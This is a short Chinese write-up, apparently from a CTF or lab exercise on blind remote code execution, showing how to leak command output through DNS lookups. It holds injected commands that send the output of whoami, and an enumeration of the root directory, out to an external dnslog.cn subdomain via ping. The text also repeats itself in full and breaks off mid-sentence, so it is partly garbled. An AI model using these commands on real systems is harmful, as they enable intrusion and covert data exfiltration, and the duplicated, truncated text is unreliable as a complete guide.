目录
1、blind-rce
因为是盲打,数据不能带出,因此采用dns查询的方式把数据带出到dns服务器上。采用dnslog
在盲打界面输入指令
ping `whoami`.5w8un1.dnslog.cn
提交后到dnslog中刷新记录可以看到如下图中所示用户为“application”
针对根目录测试
ls / | awk -F' ' '{system("ping -c 2 "NR".5w8un1.dnslog.cn")}'
提交后,
目录
因为是盲打,数据不能带出,因此采用dns查询的方式把数据带出到dns服务器上。采用dnslog
在盲打界面输入指令
ping `whoami`.5w8un1.dnslog.cn
提交后到dnslog中刷新记录可以看到如下图中所示用户为“application”
针对根目录测试
ls / | awk -F' ' '{system("ping -c 2 "NR".5w8un1.dnslog.cn")}'
提交后,